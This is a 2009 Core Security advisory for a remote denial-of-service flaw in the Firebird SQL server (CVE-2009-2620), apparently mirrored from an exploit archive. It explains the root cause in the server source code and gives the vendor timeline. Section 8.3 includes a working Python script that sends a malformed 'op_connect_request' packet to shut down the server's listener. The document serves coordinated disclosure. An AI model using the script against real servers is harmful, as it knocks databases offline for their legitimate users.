Skip to content
cyberexploits
doswindowstext

Firebird SQL - op_connect_request main listener shutdown Exploit

Firebird SQL - op_connect_request main listener shutdown Exploit

Published on 2009-07-28

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/windows/dos/9295.txt7eac4c3a
raw
-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1



      Core Security Technologies - CoreLabs Advisory

           http://www.coresecurity.com/corelabs/



Firebird SQL op_connect_request main listener shutdown vulnerability





1. *Advisory Information*



Title: Firebird SQL op_connect_request main listener shutdown vulnerability

Advisory ID: CORE-2009-0707

Advisory URL: http://www.coresecurity.com/content/firebird-sql-dos

Date published: 2009-07-28

Date of last update: 2009-07-28

Vendors contacted: Firebird SQL

Release mode: Coordinated release





2. *Vulnerability Information*



Class: Denial of service (DoS)

Remotely Exploitable: Yes

Locally Exploitable: No

Bugtraq ID: 35842

CVE Name: CVE-2009-2620





3. *Vulnerability Description*



Firebird SQL [1] is an open source relational database management system

offering many ANSI SQL standard features that runs on Linux, Windows,

and a variety of Unix platforms.



A remote denial of service vulnerability has been found in Firebird SQL,

which can be exploited by a remote attacker to force the server to close

the socket where it is listening for incoming connections and to enter

an infinite loop, by sending an unexpected 'op_connect_request' message

with invalid data to the server.





4. *Vulnerable packages*



   . Firebird SQL v1.5.5

   . Firebird SQL v2.0.1

   . Firebird SQL v2.0.5

   . Firebird SQL v2.1.1

   . Firebird SQL v2.1.2

   . Firebird SQL v2.1.3 RC1

   . Firebird SQL v2.5.0 Beta 1





5. *Non-vulnerable packages*



   . Firebird SQL v2.1.3 Release Candidate 2 (estimated release: July 2009)

   . Firebird SQL v2.5 Beta 2 (estimated release: July 2009)

   . Firebird SQL v1.5.6 (estimated release: August 2009)

   . Firebird SQL v2.0.6 (estimated release: October 2009)



Please build a fresh CVS checkout to have a fixed version sooner.





6. *Vendor Information, Solutions and Workarounds*



The issue is resolved in all branches of the Firebird SQL repository. It

is registered in the Firebird SQL bug tracker as:

http://tracker.firebirdsql.org/browse/CORE-2563





7. *Credits*



This vulnerability was discovered and researched by Francisco Falcon

from Core Security Technologies.





8. *Technical Description / Proof of Concept Code*





8.1. *Introduction*



Firebird SQL is an open source relational database management system

offering many ANSI SQL standard features that runs on Linux, Windows and

a variety of Unix platforms.



A remote denial of service can be triggered by an unauthenticated

attacker, by sending an unexpected 'op_connect_request' message with

invalid data of length greater than or equal to 12 bytes to the server.



Inside the server ('src/remote/server.cpp'), the function

'process_packet2()' processes a packet received from a client. This

function has a 'switch' statement that considers all the possible

opcodes defined in the protocol (see 'P_OP' enum 'in

src/remote/protocol.h').



/-----------



src/remote/server.cpp:



...

3404	P_OP op = receive->p_operation;

3405	switch (op)

3406	{

3407	case op_connect:

	...

3426	case op_compile:

	...

3430	case op_attach:

	...



- -----------/



 In the case of an 'op_connect_request' packet, the execution flow goes

to the following 'case' in the 'switch' statement:



/-----------



src/remote/server.cpp:



...

3584	case op_connect_request:

3585		aux_request(port, &receive->p_req, sendL);

3586		break;



- -----------/



 After calling 'aux_request()' function and executing the 'break'

statement, execution lands here:



/-----------



src/remote/server.cpp:



...

3652	if (port && port->port_state == state_broken) {

3653		if (!port->port_parent) {

3654			gds__log("SERVER/process_packet: broken port, server exiting");

3655			port->disconnect(sendL, receive);

3656			ThreadData::restoreSpecific();

3657			return false;

3658		}

3659		port->disconnect(sendL, receive);

3660		port = NULL;

3661	}



- -----------/



 By debugging the 'fbserver.exe' binary when it receives an

'op_connect_request' packet, we can see that the conditions of the first

'if' statement are satisfied, but the condition of the second 'if' is

not, so execution flow goes to the 'port->disconnect()' call:



/-----------



005ACE2C  |>  837E 0C 03           CMP DWORD PTR DS:[ESI+C],3

    ;port->port_state == state_broken ?

005ACE30  |.  75 1B                JNZ SHORT fbserver.005ACE4D

005ACE32  |.  837E 1C 00           CMP DWORD PTR DS:[ESI+1C],0

    ;port->port_parent == 0?

005ACE36  |.  75 0A                JNZ SHORT fbserver.005ACE42

    ;this conditional jump is taken

005ACE38  |.  68 D4D65F00          PUSH fbserver.005FD6D4

    ;  ASCII "SERVER/process_packet: broken port, server exiting"

005ACE3D  |.^ E9 44FDFFFF          JMP fbserver.005ACB86

005ACE42  |>  53                   PUSH EBX

    ; /Arg2

005ACE43  |.  57                   PUSH EDI

    ; |Arg1

005ACE44  |.  8BCE                 MOV ECX,ESI

    ; |

005ACE46  |.  E8 65D7FFFF          CALL <fbserver.rem_port::disconnect>

    ; \port->disconnect(sendL, receive)



- -----------/



 The type of 'port' is 'struct rem_port', as defined in

'src/remote/remote.h'. This struct type has a 'disconnect()' function

that is implemented in 'src/remote/server.cpp':



/-----------



src/remote/server.cpp:



1464	void rem_port::disconnect(PACKET* sendL, PACKET* receiveL)



- -----------/



 Inside this function, the following code is executed, in order to free

both the sent and received packets and to close the corresponding sockets:



/-----------



src/remote/server.cpp:



...

1492	REMOTE_free_packet(this, sendL);

1493	REMOTE_free_packet(this, receiveL);

1494	this->disconnect();



- -----------/



 That call to 'this->disconnect()' will ultimately lead to the

'disconnect()' function in 'src/remote/inet.cpp'. This function is

intended to break a remote connection, and receives a 'rem_port'

structure as parameter.



/-----------



src/remote/inet.cpp:



1731	static void disconnect( rem_port* port)

1732	{



- -----------/



 In the first place, the function closes the connection established by

the client, by calling the 'shutdown' function:



/-----------



src/remote/inet.cpp:



...

1763	if (port->port_handle && (SOCKET) port->port_handle !=

INVALID_SOCKET) {

1764		shutdown((int) port->port_handle, 2);

1765	}



- -----------/



 After that, as a comment line states, if the current 'rem_port'

structure being disconnected is a child of another 'rem_port' structure,

it recursively calls 'disconnect()' to disconnect the 'rem_port' stored

at 'port->port_async'. 'port_async' is a member of 'rem_port' struct

that describes an asynchronous sibling port.



/-----------



src/remote/inet.cpp:



/* If this is a sub-port, unlink it from it's parent */

...

1789	rem_port* parent = port->port_parent;

1790	if (parent != NULL) {

1791		if (port->port_async) {

1792			disconnect(port->port_async);

1793			port->port_async = NULL;

1794		}



- -----------/



 But when that recursive call to 'disconnect()' is made, the

'port->port_async' passed as parameter to be disconnected corresponds to

the main server socket, that is, the socket listening for incoming

connections on port 3050/TCP. Once in the recursive call, 'shutdown()'

and 'closesocket()' functions are invoked, making the server to stop

listening on the default port 3050/TCP, thus denying the service to

legitimate users.





8.2. *Remarks*



As a side effect, the 'fbserver.exe' process will enter an infinite

loop, consuming 100% CPU time.



On Windows platform, in a default installation, Firebird SQL server is

installed as a Windows service, and another service (the Firebird

Guardian) runs together with the server, in order to automatically

restart the 'fbserver.exe' process if it crashes or stops running

abnormally. However, in this case the Firebird Guardian is unable to

detect the denial of service condition, because the server does not

crash nor stops running.



In Firebird SQL 1.5.5 the behavior is different; the server will crash

inside the 'aux_request()' function in 'src/remote/server.cpp' due to a

null pointer dereference, instead of silently shutting down its listener

port. The problem arises when 'port->port_context' (which has a 'NULL'

value at this point) is loaded into 'rdb' variable and then, at line

'885', it is used as a pointer without properly checking that it points

to a valid memory address:



/-----------



src/remote/server.cpp:



...

884		rdb = port->port_context;

885		port->send_response(send, rdb->rdb_id,

886				send->p_resp.p_resp_data.cstr_length, status_vector);



- -----------/









8.3. *Proof of concept*



The following Python script will trigger the denial of service condition

on Firebird SQL, by sending an 'op_connect_request' packet with invalid

data of length greater than or equal to 12 bytes.





/-----------



import socket

import time



def attack(host, port):

    op_connect_request = '\x35'     # Request to establish connection



    packet  = '\x00\x00\x00' + op_connect_request

    packet += "A" * 12              #Invalid data, must be >= 12 bytes

in order to trigger the DoS



    print "(+) Connecting to the server...."

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    s.connect((host, port))

    print "(+) Sending op_connect_request packet..."

    s.send(str(packet))

    s.close()

    print "(+) op_connect_request packet successfully sent."



    #Wait 10 seconds and try to connect again to Firebird SQL server, to

check if it's down

    print "(+) Waiting 10 seconds before trying to reconnect to the

server..."

    time.sleep(10)



    try:

        print "(+) Trying to reconnect..."

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        s.connect((host, port))

        s.close()

        print "(!) Something went wrong. The server is still alive."

    except socket.error:

        print "(*) Attack successful. The server is down."





port = 3050

host = '192.168.131.128'            #Replace with your target host

attack(host, port)



- -----------/







9. *Report Timeline*



. 2009-07-15:

Core Security Technologies notifies the Firebird team of the vulnerability.



. 2009-07-16:

Firebird team requests technical details in plaintext.



. 2009-07-16:

Core sends the advisory draft, including technical details.



. 2009-07-20:

Firebird team notifies that the issue is resolved in all branches of the

Firebird repository [2]. Technical details will be publicly visible when

Core releases its advisory. Firebird team notices that Firebird version

1.5.5 (marked as non vulnerable in the advisory draft) seems to be

affected.



. 2009-07-27:

Core sends the final version of the advisory to the Firebird team.



. 2009-07-28:

The advisory CORE-2009-0707 is published.







10. *References*



[1] http://www.firebirdsql.org

[2] http://tracker.firebirdsql.org/browse/CORE-2563





11. *About CoreLabs*



CoreLabs, the research center of Core Security Technologies, is charged

with anticipating the future needs and requirements for information

security technologies. We conduct our research in several important

areas of computer security including system vulnerabilities, cyber

attack planning and simulation, source code auditing, and cryptography.

Our results include problem formalization, identification of

vulnerabilities, novel solutions and prototypes for new technologies.

CoreLabs regularly publishes security advisories, technical papers,

project information and shared software tools for public use at:

http://www.coresecurity.com/corelabs.





12. *About Core Security Technologies*



Core Security Technologies develops strategic solutions that help

security-conscious organizations worldwide develop and maintain a

proactive process for securing their networks. The company's flagship

product, CORE IMPACT, is the most comprehensive product for performing

enterprise security assurance testing. CORE IMPACT evaluates network,

endpoint and end-user vulnerabilities and identifies what resources are

exposed. It enables organizations to determine if current security

investments are detecting and preventing attacks. Core Security

Technologies augments its leading technology solution with world-class

security consulting services, including penetration testing and software

security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core

Security Technologies can be reached at 617-399-6980 or on the Web at

http://www.coresecurity.com.





13. *Disclaimer*



The contents of this advisory are copyright (c) 2009 Core Security

Technologies and (c) 2009 CoreLabs, and may be distributed freely

provided that no fee is charged for this distribution and proper credit

is given.





14. *PGP/GPG Keys*



This advisory has been signed with the GPG key of Core Security

Technologies advisories team, which is available for download at

http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-----BEGIN PGP SIGNATURE-----

Version: GnuPG v1.4.8 (MingW32)

Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org



iEYEARECAAYFAkpvTl0ACgkQyNibggitWa17uQCeMYg7kPSMqmAB1vDNn7Q7xzel

0BYAoJLL6358DsIP9wuSZDxTH3DiUp7Z

=GgTL

-----END PGP SIGNATURE-----



# milw0rm.com [2009-07-28]

View on GitHub